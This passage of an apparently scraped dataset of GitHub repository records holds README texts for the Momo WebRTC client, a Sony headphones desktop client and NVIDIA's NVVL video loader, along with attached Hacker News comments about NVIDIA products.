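        unsigned long n = acl_channel_recvul(chan);  // yields until data arrives
        printf("received %lu\r\n", n);
    }
}

int main(void) {
    chan = acl_channel_create(sizeof(unsigned long), 100);
    acl_fiber_create(producer, NULL, 128000);
    acl_fiber_create(consumer, NULL, 128000);
    acl_fiber_schedule();  // runs until all fibers exit
    acl_channel_free(chan);
    return 0;
}
```\n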
\n## About API hooking\nOn Linux/MacOS/FreeBSD, many of the IO- and network-related system APIs are hooked. By simply linking libfiber into your build, your application only needs to use the standard system IO APIs and your network program becomes coroutine-enabled automatically. Below is a list of the hooked system APIs: \n- close\n- sleep\n- read\n- readv\n- recv\n- recvfrom\n- recvmsg\n- write\n- writev\n- send\n- sendto\n- sendmsg\n- sendfile64\n- socket\n- listen\n- accept\n- connect\n- select\n- poll\n- epoll: epoll_create, epoll_ctl, epoll_wait\n- gethostbyname(_r)\n- getaddrinfo/freeaddrinfo\n\n## FAQ\n(To be continued; please refer to the English FAQ for now.)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "shiguredo/momo", "link": "https://github.com/shiguredo/momo", "tags": ["webrtc", "libwebrtc", "raspberry-pi", "macos", "ubuntu", "4k-video", "jetson", "windows"], "stars": 661, "description": "WebRTC Native Client Momo", "lang": "C++", "repo_lang": "", "readme": "# WebRTC Native Client Momo\n\n[![libwebrtc](https://img.shields.io/badge/libwebrtc-m107.5304-blue.svg)](https://chromium.googlesource.com/external/webrtc/+/branch-heads/5304)\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/tag/shiguredo/momo.svg)](https://github.com/shiguredo/momo)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Actions Status](https://github.com/shiguredo/momo/workflows/daily-build-workflow/badge.svg)](https://github.com/shiguredo/momo/actions)\n\n## About Shiguredo's open source software\n\nWe will not respond to PRs or issues that have not been discussed on Discord. Please read https://github.com/shiguredo/oss/blob/master/README.en.md before use.\n\n## About WebRTC Native Client Momo\n\nWebRTC Native Client Momo is a WebRTC native client that uses libwebrtc and works in various environments without a browser.\n\nhttps://momo.shiguredo.jp/\n\n### Support for hardware encoders\n\n- [NVIDIA Jetson](https://www.nvidia.com/ja-jp/autonomous-machines/embedded-systems/): 4K@30 delivery is possible using its VP8, VP9 and H.264 hardware encoders\n- The H.264 hardware encoder built into the GPU of the [Raspberry Pi](https://www.raspberrypi.org/) can be used\n- The H.264 hardware accelerator in Apple macOS can be used via [VideoToolbox](https://developer.apple.com/documentation/videotoolbox)\n- The hardware accelerator in NVIDIA graphics cards can be used via the [NVIDIA VIDEO CODEC SDK](https://developer.nvidia.com/nvidia-video-codec-sdk)\n- [Intel Quick Sync Video](https://www.intel.co.jp/content/www/jp/ja/architecture-and-technology/quick-sync-video/quick-sync-video-general.html) VP9 / H.264 hardware acceleration is available\n\n### Broadcast at 4K 30fps\n\nMomo can deliver 4K 60fps over WebRTC by using a hardware encoder.\n\n### Support for simulcast\n\nMomo supports simulcast (simultaneous distribution at multiple quality levels) when using Sora mode.\n\n### Serial read/write via the data channel\n\nMomo can read and write directly to a serial port using the data channel. 
It is intended for cases where low latency matters more than reliability.\n\n### Receiving audio and video using SDL\n\nWhen using Momo in a GUI environment, you can receive audio and video using [Simple DirectMedia Layer](https://www.libsdl.org/).\n\n### Support for AV1\n\nAV1 transmission and reception are already supported.\n\n### Support for client certificates\n\nMomo supports client certificates when using Sora mode.\n\n## Video\n\n[4K@30 delivery with WebRTC Native Client Momo and Jetson Nano](https://www.youtube.com/watch?v=z05bWtsgDPY)\n\n## About the OpenMomo project\n\nOpenMomo is a project that publishes WebRTC Native Client Momo as open source and continuously develops it.\nWe hope that WebRTC can be used for various purposes beyond browsers and smartphones.\n\nPlease see below for details.\n\n[OpenMomo Project](https://gist.github.com/voluntas/51c67d0d8ce7af9f24655cee4d7dd253)\n\nMomo's tweets are summarized below.\n\nhttps://gist.github.com/voluntas/51c67d0d8ce7af9f24655cee4d7dd253#twitter\n\n## Known Issues\n\n[Resolution policy for known issues](https://github.com/shiguredo/momo/issues/89)\n\n## Binaries\n\nPrecompiled binaries can be downloaded from:\n\nhttps://github.com/shiguredo/momo/releases\n\n## Operating environment\n\n- Raspberry Pi OS (64bit) ARMv8\n - Raspberry Pi 4\n - Raspberry Pi 3\n - Raspberry Pi 2\n- Raspberry Pi OS (32bit) ARMv7\n - Raspberry Pi 4\n - Raspberry Pi 3\n - Raspberry Pi 2\n - Raspberry Pi Zero 2\n- Raspberry Pi OS (32bit) ARMv6\n - Raspberry Pi Zero\n - Raspberry Pi 1\n- Ubuntu 20.04 x86_64\n- Ubuntu 18.04 ARMv8 Jetson\n - Support ends at the end of April 2023\n - [NVIDIA Jetson Nano](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-nano/)\n - [NVIDIA Jetson Xavier NX](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-xavier-nx/)\n - [NVIDIA Jetson AGX Xavier](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-agx-xavier/)\n- macOS 12 arm64 or later\n- Windows 10.1809 x86_64 or later\n\n### Not supported\n\n- macOS x86_64\n- Ubuntu 20.04 ARMv8 Jetson\n - [NVIDIA Jetson AGX Orin](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-orin/)\n - [NVIDIA Jetson Orin NX](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-orin/)\n - [NVIDIA Jetson Xavier NX](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-xavier-nx/)\n - [NVIDIA Jetson AGX Xavier](https://www.nvidia.com/en-us/autonomous-machines/embedded-systems/jetson-agx-xavier/)\n - [NVIDIA Jetson Orin Nano](https://www.nvidia.com/ja-jp/autonomous-machines/embedded-systems/jetson-orin/)\n\n## Try it\n\nIf you want to try Momo, read [USE.md](doc/USE.md).\n\n## Build\n\n- If you want to build Momo for Linux, read [BUILD_LINUX.md](doc/BUILD_LINUX.md)\n- If you want to build Momo for macOS, read [BUILD_MACOS.md](doc/BUILD_MACOS.md)\n- If you want to build Momo for Windows, read [BUILD_WINDOWS.md](doc/BUILD_WINDOWS.md)\n\n## Creating a package\n\nIf you want to create a package, please read [PACKAGE.md](doc/PACKAGE.md).\n\n## FAQ\n\nPlease read [FAQ.md](doc/FAQ.md).\n\n## License\n\nApache License 2.0\n\n```\nCopyright 2015-2022, tnoho (Original Author)\nCopyright 2018-2022, Shiguredo Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, 
software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n```\n\n## Priority implementation\n\nPriority implementation means implementing planned Momo features ahead of schedule, for a fee, exclusively for customers who have a Sora license contract.\n\n- OSS version for Windows\n - [Sloth Networks Co., Ltd.](http://www.sloth-networks.co.jp)\n- Support for WebRTC statistics\n - Company name not disclosed at this time\n- Momo NVIDIA VIDEO CODEC SDK support for Windows\n - [Sloth Networks Co., Ltd.](http://www.sloth-networks.co.jp)\n- Momo NVIDIA VIDEO CODEC SDK support for Linux\n - [Optim Co., Ltd.](https://www.optim.co.jp/)\n- Screen capture for the Windows / Linux versions\n - [Sloth Networks Co., Ltd.](http://www.sloth-networks.co.jp)\n\n### Feature list for priority implementation\n\n**Feel free to contact us via Discord or email for more information**\n\n- AV1 support\n - Windows\n- Statistics\n - Output via Ayame's signaling\n- oneVPL support\n- Recording support\n - Output in MP4 format\n - Output in WebM format\n- Recording composition support\n- E2EE when using Sora mode\n- Windows / macOS binary signing\n\n## E-book about Momo\n\nA book packed with Momo know-how, written by Momo's original author @tnoho, is on sale:\n\n\"Why don't you use WebRTC outside the browser to increase what you can do with the browser?\"\n\n## Support\n\n### Discord\n\n- **No guaranteed support**\n- Advice is offered\n- Feedback welcome\n\nWe share the latest status on Discord. Questions and consultations are also accepted only on Discord.\n\nhttps://discord.gg/shiguredo\n\n### Bug reports\n\nPlease join us on Discord.\n\n### About paid technical support\n\nA paid technical support contract for WebRTC Native Client assumes that the customer has a WebRTC SFU Sora license contract.\n\n- Momo technical support\n- Adding features to Momo (released as OSS)\n\n## H.264 license fees\n\nNo license fee is required to distribute Momo on its own using **only** an H.264 hardware encoder.\nWhen distributing it together with hardware, a license fee must be paid.\n\nHowever, since the H.264 license is included in the hardware cost of the Raspberry Pi,\nyou don't have to pay any license fee when distributing for it.\n\nWe recommend contacting [MPEG LA](https://www.mpegla.com/) for details.\n\n- The license cost for the Raspberry Pi's hardware encoder is included in the Raspberry Pi's price\n - https://www.raspberrypi.org/forums/viewtopic.php?t=200855\n- Apple's license only covers personal and non-commercial use, so a separate contract with the organization is required for distribution\n - https://store.apple.com/Catalog/Japan/Images/EA0270_QTMPEG2.html\n- The license fee for the hardware encoder in AMD video cards is separate and requires a contract with the organization\n - https://github.com/GPUOpen-LibrariesAndSDKs/AMF/blob/master/amf/doc/AMF_API_Reference.pdf\n- The license fee for the hardware encoder in NVIDIA video cards is separate and requires a contract with the organization\n - https://developer.download.nvidia.com/designworks/DesignWorks_SDKs_Samples_Tools_License_distrib_use_rights_2017_06_13.pdf\n- The license fee for the NVIDIA Jetson Nano's hardware encoder is separate and requires a contract with the organization\n - [License for H\\.264/H\\.265 Hardware Encoder with NVIDIA Jetson 
Nano](https://medium.com/@voluntas/nvidia-jetson-nano-%E6%90%AD%E8%BC%89%E3%81%AE-h-264-h-265-%E3%83%8F%E3%83%BC%E3%83%89%E3%82%A6%E3%82%A7%E3%82%A2%E3%82%A8%E3%83%B3%E3%82%B3%E3%83%BC%E3%83%80%E3%81%AE%E3%83%A9%E3%82%A4%E3%82%BB%E3%83%B3%E3%82%B9%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6-ca207af302ee)\n- The Intel Quick Sync Video hardware encoder license fee is separate and requires a contract with the organization\n - [QuickSync \\- H\\.264 patent licensing fees \\- Intel Community](https://community.intel.com/t5/Media-Intel-oneAPI-Video/QuickSync-H-264-patent-licensing-fees/td-p/921396)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Plutoberth/SonyHeadphonesClient", "link": "https://github.com/Plutoberth/SonyHeadphonesClient", "tags": ["reverse-engineering", "cpp", "dear-imgui", "imgui", "bluetooth", "macos", "linux", "windows", "gui"], "stars": 660, "description": "A {Windows, macOS, Linux} client recreating the functionality of the Sony Headphones app", "lang": "C++", "repo_lang": "", "readme": "
# Sony Headphones Client\n\nThis project features a PC alternative for the mobile-only Sony Headphones app.\n\n*(Program screenshot)*\n\n[![macOS](https://github.com/plutoberth/sonyheadphonesclient/actions/workflows/xcodebuild.yml/badge.svg)](https://github.com/Plutoberth/SonyHeadphonesClient/actions/workflows/xcodebuild.yml)\n[![Linux & Windows](https://github.com/plutoberth/sonyheadphonesclient/actions/workflows/cmake.yml/badge.svg)](https://github.com/Plutoberth/SonyHeadphonesClient/actions/workflows/cmake.yml)\n[![Github all releases](https://img.shields.io/github/downloads/Plutoberth/SonyHeadphonesClient/total.svg)](https://GitHub.com/Plutoberth/SonyHeadphonesClient/releases/)\n[![Donate](static/badge.svg)](https://paypal.me/plutoberth)\n
\n\n## Table of Contents\n\n* [Disclaimer](#disclaimer)\n* [Download](#download)\n* [Motivation](#motivation)\n* [Features](#features)\n* [Supported Platforms](#supported-platforms-and-headsets)\n* [For Developers](#for-developers)\n* [Contributors](#contributors)\n* [License](#license)\n\n\n## Disclaimer\n\n### THIS PROGRAM IS NOT AFFILIATED WITH SONY. YOU ARE RESPONSIBLE FOR ANY DAMAGE THAT MAY OCCUR WHILE USING THIS PROGRAM.\n\n## Download\n\nYou can download compiled versions of the client from the [releases page](https://github.com/Plutoberth/SonyHeadphonesClient/releases).\n\n**Note:** If you're getting an error like `VCRUNTIME140_1.dll was not found`, you need to install the `Microsoft VC++ Redistributable`.\n\n## Motivation\n\nI recently bought the WH-1000-XM3s, and I was annoyed by the fact that I couldn't change their settings while using my PC.\nSo I reverse-engineered the application (for intercompatibility purposes, of course), defined the protocol, and created an alternative application with [Mr-M33533K5](https://github.com/Mr-M33533K5).\n\n## Features\n\n- [x] Ambient Sound Control\n- [x] Disabling noise cancelling\n- [x] Virtual Sound - VPT and Sound Position\n- [ ] Display battery life and fetch existing settings from the device\n- [ ] Equalizer\n\n## Supported Platforms And Headsets\n\n* WH-1000-XM3: Fully works and supported\n* [WH-1000-XM4](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29#issuecomment-792459162): Partially works, more work is needed\n* [MDR-XB950BT](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29#issuecomment-804292227): Fully works\n* And more! Check out [Headset Reports](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29)\n\n#### **Please report your experience with other Sony headsets in the [Headset Reports](https://github.com/Plutoberth/SonyHeadphonesClient/issues/29) issue.**\n\n- [x] Windows\n- [x] Linux\n- [x] macOS\n- [ ] ~~TempleOS~~\n\n## For Developers\n\n```git clone --recurse-submodules https://github.com/Plutoberth/SonyHeadphonesClient.git```\n\nIssue this incantation to fix submodule issues:\n```sh\ngit submodule sync\ngit submodule update\n```\n\n### Protocol Information\n\nSome enums and data are present in the code. The rest has to be obtained either statically or dynamically.\n\nSniffing messages - See [this helpful comment](https://github.com/Plutoberth/SonyHeadphonesClient/pull/36#issuecomment-795633877) by @guilhermealbm.\n\n### Compiling\n\n#### Windows & Linux\n\n```\ncd Client\nmkdir build\ncd build\ncmake ..\ncmake --build .\n```\n\nLinux dependencies (Debian/Ubuntu):\n\n```bash\nsudo apt install libbluetooth-dev libglew-dev libglfw3-dev libdbus-1-dev\n```\n\n#### macOS\n\nUse the provided xcodeproj file.\n\n## Contributors\n\n* [Plutoberth](https://github.com/Plutoberth) - Initial Work and Windows Version\n* [Mr-M33533K5](https://github.com/Mr-M33533K5) - BT Interface and Other Help\n* [semvis123](https://github.com/semvis123) - macOS Version\n* [jimzrt](https://github.com/jimzrt) - Linux Version\n* [guilhermealbm](https://github.com/guilhermealbm) - Noise Cancelling Switch\n\n\n## License\n\nDistributed under the [MIT License](https://github.com/Plutoberth/SonyHeadphonesClient/blob/master/LICENSE). 
See LICENSE for more information.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "NVIDIA/nvvl", "link": "https://github.com/NVIDIA/nvvl", "tags": [], "stars": 659, "description": "A library that uses hardware acceleration to load sequences of video frames to facilitate machine learning training", "lang": "C++", "repo_lang": "", "readme": "# NVVL is part of DALI!\n[DALI (Nvidia Data Loading Library)](https://developer.nvidia.com/dali) incorporates NVVL functionality and offers much more than that, so it is recommended to switch to it.\nThe DALI source code is also open source and available on [GitHub](https://github.com/NVIDIA/DALI).\nUp-to-date documentation can be found [here](https://docs.nvidia.com/deeplearning/sdk/dali-developer-guide/docs/index.html).\nThe NVVL project will still be available on GitHub but it won't be maintained. Please submit all future issues and requests [in the DALI repository](https://github.com/NVIDIA/DALI/issues).\n\n# NVVL\nNVVL (**NV**IDIA **V**ideo **L**oader) is a library to load random\nsequences of video frames from compressed video files to facilitate\nmachine learning training. It uses FFmpeg's libraries to parse and\nread the compressed packets from video files and the video decoding\nhardware available on NVIDIA GPUs to off-load and accelerate the\ndecoding of those packets, providing a ready-for-training tensor in\nGPU device memory. NVVL can additionally perform data augmentation\nwhile loading the frames. Frames can be scaled, cropped, and flipped\nhorizontally using the GPU's dedicated texture mapping units. Output\ncan be in RGB or YCbCr color space, normalized to [0, 1] or [0, 255],\nand in `float`, `half`, or `uint8` tensors.\n\n**Note that, while we hope you find NVVL useful, it is example code\nfrom a research project performed by a small group of NVIDIA researchers.\nWe will do our best to answer questions and fix small bugs as they come\nup, but it is not a supported NVIDIA product and is for the most part\nprovided as-is.**\n\nUsing compressed video files instead of individual frame image files\nsignificantly reduces the demands on the storage and I/O systems\nduring training. Storing video datasets as video files consumes an\norder of magnitude less disk space, allowing larger datasets to fit\nboth in system RAM and on local SSDs for fast access. During\nloading fewer bytes must be read from disk. Fitting on smaller, faster\nstorage and reading fewer bytes at load time alleviates the bottleneck\nof retrieving data from disks, which will only get worse as GPUs get\nfaster. For the dataset used in our example project, H.264 compressed\n`.mp4` files were nearly 40x smaller than storing frames as `.png`\nfiles.\n\nUsing the hardware decoder on NVIDIA GPUs to decode images\nsignificantly reduces the demands on the host CPU. This means fewer\nCPU cores need to be dedicated to data loading during training. This\nis especially important in servers with a large number of GPUs per\nCPU, such as in the NVIDIA DGX-2 server, but also provides\nbenefits for other platforms. 
When training our example project on an\nNVIDIA DGX-1, the CPU load when using NVVL was 50-60% of the load seen\nwhen using a normal dataloader for `.png` files.\n\nMeasurements that quantify the performance advantages of using NVVL\nare detailed in our [super resolution example\nproject](/examples/pytorch_superres).\n\nMost users will want to use the deep learning framework wrappers\nprovided rather than using the library directly. Currently a wrapper\nfor PyTorch is provided (PRs for other frameworks are welcome). See\nthe [PyTorch wrapper README](/pytorch/README.md) for documentation on\nusing the PyTorch wrapper. Note that it is not required to build or\ninstall the C++ library before building the PyTorch wrapper (its\nsetup scripts will do so for you).\n\n# Building and Installing\n\nNVVL depends on the following:\n- CUDA Toolkit. We have tested versions 8.0 and later but earlier\n versions may work. NVVL will perform better with CUDA 9.0 or\n later[1](#f1).\n- FFmpeg's libavformat, libavcodec, libavfilter, and libavutil. These\n can be installed from source as in the [example\n Dockerfiles](/docker) or from the Ubuntu 16.04 packages\n `libavcodec-dev libavfilter-dev libavformat-dev\n libavutil-dev`. Other distributions should have similar packages.\n\nAdditionally, building from source requires CMake version 3.8 or above\nand some examples optionally make use of some libraries from OpenCV if\nthey are installed.\n\nThe [docker](docker) directory contains Dockerfiles that can be used\nas a starting point for creating an image to build or use the NVVL\nlibrary. The [example's docker directory](examples/pytorch/docker) has\nan example Dockerfile that actually builds and installs the NVVL\nlibrary.\n\nCMake 3.8 and above provides builtin CUDA language support that NVVL's\nbuild system uses. Since CMake 3.8 is relatively new and not yet in\nwidely used Linux distributions, it may be required to install a new\nversion of CMake. The easiest way to do so is to make use of their\npackage on PyPI:\n\n```\npip install cmake\n```\n\nAlternatively, or if `pip` isn't available, you can install to\n`/usr/local` from a binary distribution:\n\n```sh\nwget https://cmake.org/files/v3.10/cmake-3.10.2-Linux-x86_64.sh\n/bin/sh cmake-3.10.2-Linux-x86_64.sh --prefix=/usr/local\n```\n\nSee https://cmake.org/download/ for more options.\n\nBuilding and installing NVVL follows the typical CMake pattern:\n\n```sh\nmkdir build && cd build\ncmake ..\nmake -j\nsudo make install\n```\n\nThis will install `libnvvl.so` and development headers into\nappropriate subdirectories under `/usr/local`. CMake can be passed the\nfollowing options using `cmake .. -DOPTION=Value`:\n\n- `CUDA_ARCH` - Names of CUDA architectures to generate device code\n for, separated by semicolons. Valid options are `Kepler`,\n `Maxwell`, `Pascal`, and `Volta`. You can also use specific\n architecture names such as `sm_61`. Default is\n `Maxwell;Pascal;Volta`.\n\n- `CMAKE_CUDA_FLAGS` - A string of arguments to pass to `nvcc`. In\n particular, you can decide to link against the static or shared\n runtime library using `-cudart shared` or `-cudart static`. You can\n also use this for finer control of code generation than `CUDA_ARCH`,\n see the `nvcc` documentation. Default is `-cudart shared`.\n\n- `WITH_OPENCV` - Set this to 1 to build the examples with the\n optional OpenCV functionality.\n\n- `CMAKE_INSTALL_PREFIX` - Install directory. 
Default is\n `/usr/local`.\n\n- `CMAKE_BUILD_TYPE` - `Debug` or `Release` build.\n\nSee the [CMake documentation](https://cmake.org/cmake/help/v3.8/) for\nmore options.\n\nThe examples in `doc/examples` can be built using the `examples` target:\n```\nmake examples\n```\n\nFinally, if Doxygen is installed, API documentation can be built using\nthe `doc` target:\n```\nmake doc\n```\nThis will build html files in `doc/html`.\n\n# Preparing Data\n\nNVVL supports the H.264 and HEVC (H.265) video codecs in any container\nformat that FFmpeg is able to parse. Video codecs only store certain\nframes, called keyframes or intra-frames, as a complete image in the\ndata stream. All other frames require data from other frames, either\nbefore or after them in time, to be decoded. In order to decode a\nsequence of frames, it is necessary to start decoding at the keyframe\nbefore the sequence, and continue past the sequence to the next\nkeyframe after it. This isn't a problem when streaming sequentially\nthrough a video; however, when decoding small sequences of frames\nrandomly throughout the video, a large gap between keyframes results in\nreading and decoding a large number of frames that are never used.\n\nThus, to get good performance when randomly reading short sequences\nfrom a video file, it is necessary to encode the file with frequent\nkey frames. We've found setting the keyframe interval to the length of\nthe sequences you will be reading provides a good compromise between\nfile size and loading performance. Also, NVVL's seeking logic doesn't\nsupport open GOPs in HEVC streams. To set the keyframe interval to `X`\nwhen using `ffmpeg`:\n\n- For `libx264` use `-g X`\n- For `libx265` use `-x265-params \"keyint=X:no-open-gop=1\"`\n\nThe pixel format of the video must also be yuv420p to be supported by\nthe hardware decoder. This is done by passing `-pix_fmt yuv420p` to\n`ffmpeg`. You should also remove any extra audio or video streams from\nthe video file by passing `-map v:0` to ffmpeg after the input but\nbefore the output.\n\nFor example to transcode to H.264:\n```\nffmpeg -i original.mp4 -map v:0 -c:v libx264 -crf 18 -pix_fmt yuv420p -g 5 -profile:v high prepared.mp4\n```\n\n# Basic Usage\nThis section describes the usage of the base C/C++ library; for usage\nof the PyTorch wrapper, see the [README](/pytorch/README.md) in the\npytorch directory.\n\nThe library provides both a C++ and C interface. See the examples in\n[doc/examples](doc/examples) for brief example code on how to use the\nlibrary. [extract_frames.cpp](doc/examples/extract_frames.cpp)\ndemonstrates the C++ interface and\n[extract_frames_c.c](doc/examples/extract_frames_c.c) the C\ninterface. The API documentation built with `make doc` is the\ncanonical reference for the API.\n\nThe basic flow is to create a `VideoLoader` object, tell it which\nframe sequences to read, and then give it buffers in device memory to\nput the decoded sequences into. In C++, creating a video loader is\nstraightforward:\n\n```C++\nauto loader = NVVL::VideoLoader{device_id};\n```\n\nYou can then tell it which sequences to read via `read_sequence`:\n\n```C++\nloader.read_sequence(filename, frame_num, sequence_length);\n\n```\n\nTo receive the frames from the decoder, it is necessary to create a\n`PictureSequence` to tell it how and where you want the decoded frames\nprovided. First, create a `PictureSequence`, providing a count of the\nnumber of frames to receive from the decoder. 
Note that the count here\ndoes not need to be the same as the sequence_length provided to\n`read_sequence`; you can read a large sequence of frames and receive\nthem as multiple tensors, or read multiple smaller sequences and\nreceive them concatenated as a single tensor.\n\n```C++\nauto seq = PictureSequence{sequence_count};\n```\n\nYou now create \"Layers\" in the sequence to provide the destination for\nthe frames. Each layer can be a different type, have different\nprocessing, and contain different frames from the received\nsequence. First, create a `PictureSequence::Layer` of the desired\ntype:\n\n```C++\nauto pixels = PictureSequence::Layer{};\n```\n\nNext, fill in the pointer to the data and other details. See the\ndocumentation in [PictureSequence.h](include/PictureSequence.h) for a\ndescription of all the available options.\n\n```C++\nfloat* data = nullptr;\nsize_t pitch = 0;\ncudaMallocPitch(&data, &pitch,\n crop_width * sizeof(float),\n crop_height * sequence_count * 3);\npixels.data = data;\npixels.desc.count = sequence_count;\npixels.desc.channels = 3;\npixels.desc.width = crop_width;\npixels.desc.height = crop_height;\npixels.desc.scale_width = scale_width;\npixels.desc.scale_height = scale_height;\npixels.desc.horiz_flip = false;\npixels.desc.normalized = true;\npixels.desc.color_space = ColorSpace_RGB;\npixels.desc.stride.x = 1;\npixels.desc.stride.y = pitch / sizeof(float);\npixels.desc.stride.c = pixels.desc.stride.y * crop_height;\npixels.desc.stride.n = pixels.desc.stride.c * 3;\n```\n\nNote that here we have set the strides such that the dimensions are\n\"nchw\", we could have done \"nhwc\" or any other dimension order by\nsetting the strides appropriately. Also note that the strides in the\nlayer description are number of elements, not number of bytes.\n\nWe now add this layer to our `PictureSequence`, and send it to the loader:\n\n```C++\nseq.set_layer(\"pixels\", pixels);\nloader.receive_frames(seq);\n```\n\nThis call to `receive_frames` will be\nasynchronous. `receive_frames_sync` can be used if synchronous reading\nis desired. When we are ready to use the frames we can insert a wait\nevent into the CUDA stream we are using for our computation:\n\n```C++\nseq.wait(stream);\n```\n\nThis will insert a wait event into the stream `stream`, causing any\nfurther kernels launched on `stream` to wait until the data is\nready.\n\nThe C interface follows a very similar pattern, see\n[doc/examples/extract_frames_c.c](doc/examples/extract_frames_c.c)\nfor an example.\n\n# Reference\nIf you find this library useful in your work, please cite it in your\npublications using the following BibTeX entry:\n\n```\n@misc{nvvl,\n author = {Jared Casper and Jon Barker and Bryan Catanzaro},\n title = {NVVL: NVIDIA Video Loader},\n year = {2018},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/NVIDIA/nvvl}}\n}\n```\n\n# Footnotes\n\n[1] Specifically, with nvidia kernel modules version\n384 and later, which come with CUDA 9.0+, CUDA kernels launched by\nNVVL will run asynchronously on a separate stream. With earlier kernel\nmodules, all CUDA kernels are launched on the default stream. [\u21a9](#a1)\n", "readme_type": "markdown", "hn_comments": "It seems there's some servere issues with NVIDIA Drivers on Windows which is causing high latency for many users. The issue seems to be that there's a high DPC routine execution time in the module nvlddmkm.sys which causes the aforementioned latency spikes. 
The problem is reported by lots of users with different hardware specs. It doesn't seem to be either Intel or AMD specific. The only thing all users seem to have in common is using Windows with a NVIDIA GPU. Until today neither Microsoft nor NVIDIA seem to be aware about this issue. I wish someone could raise some awareness about this issue with either of the companies, as this is an issue which is making Music Production on modern Windows almost impossible due to crackles, dropouts and other annoying issues. If you know anyone working at Microsoft or NVIDIA, I'd be super happy if you could point them towards the thread I've linked. Thanks!> Grace CPU uses LPDDR5XLooks like we\u2019re finally going with soldered RAM in the data center?Seems like this will end up driving more research into very large ML models. Some of the performance benchmarks here are for trillion parameter models. I\u2019ve observed that often Innovation directly follows silicon improvements.Are the vertical-specific Nvidia SDKs like DRIVE and Clara widely used?grace and hopper? from stranger things?I want one. Damn hotchips always has stuff I want and then can never afford even when it gets to marketNvidia opened new huge building with huge open spaces in their campus.Direct link to review article from CNET: \nNvidia has opened up a new building at its Santa Clara, California, headquarters. Voyager's unusual architecture is designed to keep company workers happy and productive.\nhttps://www.cnet.com/tech/computing/nvidias-massive-techno-p...Engineers working on hard problems in a big, distraction-filled open area. Who wouldn't want to work there?What did happen with the lapsus stuff?Will nvidia switch to open source or their hardware verilog/vhdl and driver code were leaked?From the license file:> 3.4 Patent Claims. If you bring or threaten to bring a patent claim against any Licensor (including any claim, cross-claim or counterclaim in a lawsuit) to enforce any patents that you allege are infringed by any Work, then your rights under this License from such Licensor (including the grant in Section 2.1) will terminate immediately.Is such a clause legal? I have basically zero knowledge of such things, but it seems like it should be illegal to punish someone for a good faith patent claim.This produces a kind of artefact I haven't seen before, involving little chains of circles and diamonds, e.g. https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-..., https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-... (hair). I think they follow those glowing coordinate-ish lines from the internal representation.It also seems to have given some faces contact lenses! https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-..., https://nvlabs-fi-cdn.nvidia.com/stylegan3/images/stylegan3-...> This material is based upon work supported by the US Defense Advanced Research Projects Agency (DARPA) under Contracts No.R00112030005, HR001120C0123, HR001120C0124 and FA8750-20-2-1004 and the Air Force Research Laboratory (AFRL) under Contract No. FA8750-20-2-1004.This is why AI is just a marketing term with no real future.There isn't room for corporations to profit from it out of the gate + into the future indefinitely. No one is going to pay an AWS tax to use their models on every single API hit forever. No one is going to pay nVidia a license fee to use their image recognition tools forever. 
If the creators of HTML, CSS, and Javascript wanted license fees we wouldn't be using them right now either.There are two groups of people, off the top of my head, who care about all of this:1) The US Military, because the budget for their murder robots is theoretically infinite.2) Google and Facebook because the budget for their spyware is theoretically infinite.To everyone else, it's much ado about nothing.I appreciate the section on \"Synthetic image detection\":\"While new generator approaches enable new media synthesis capabilities, they may also present a new challenge for AI forensics algorithms for detection and attribution of synthetic media. In collaboration with digital forensic researchers participating in DARPA's SemaFor program, we curated a synthetic image dataset that allowed the researchers to test and validate the performance of their image detectors in advance of the public release. Please see here for more details on detection\" https://github.com/NVlabs/stylegan3-detectorIt's important to see this sort of thing happening more and more.Is minimum 12GB limit on purpose to make people buy new GPUs? It's sad that this growing area is becoming for privileged people only.There are videos that show what they mean by \"details glued to image coordinates\" in StyleGAN2: https://nvlabs-fi-cdn.nvidia.com/stylegan3/videos/The visualizer looks fun: https://twitter.com/minimaxir/status/1447679798822649856You can't use any of it commercially. Nothing within is under an acceptable software license (nor an open source license, nor a free software license). Advanced warning.Everyone is nitpicking the licenses involved in this thread. Is this the right thing to do?It really bums me out that they didn\u2019t name it GANnamStyle.I worked with these guys at nvidia Helsinki office. They are super chill and just somehow crank out super research. Very interesting bunch.I know HN doesn't like hype, but as an AI neophyte, I find this incredible. Nvidia is doing it again. This is likely going to help with 3D generation, the next cornerstone. 
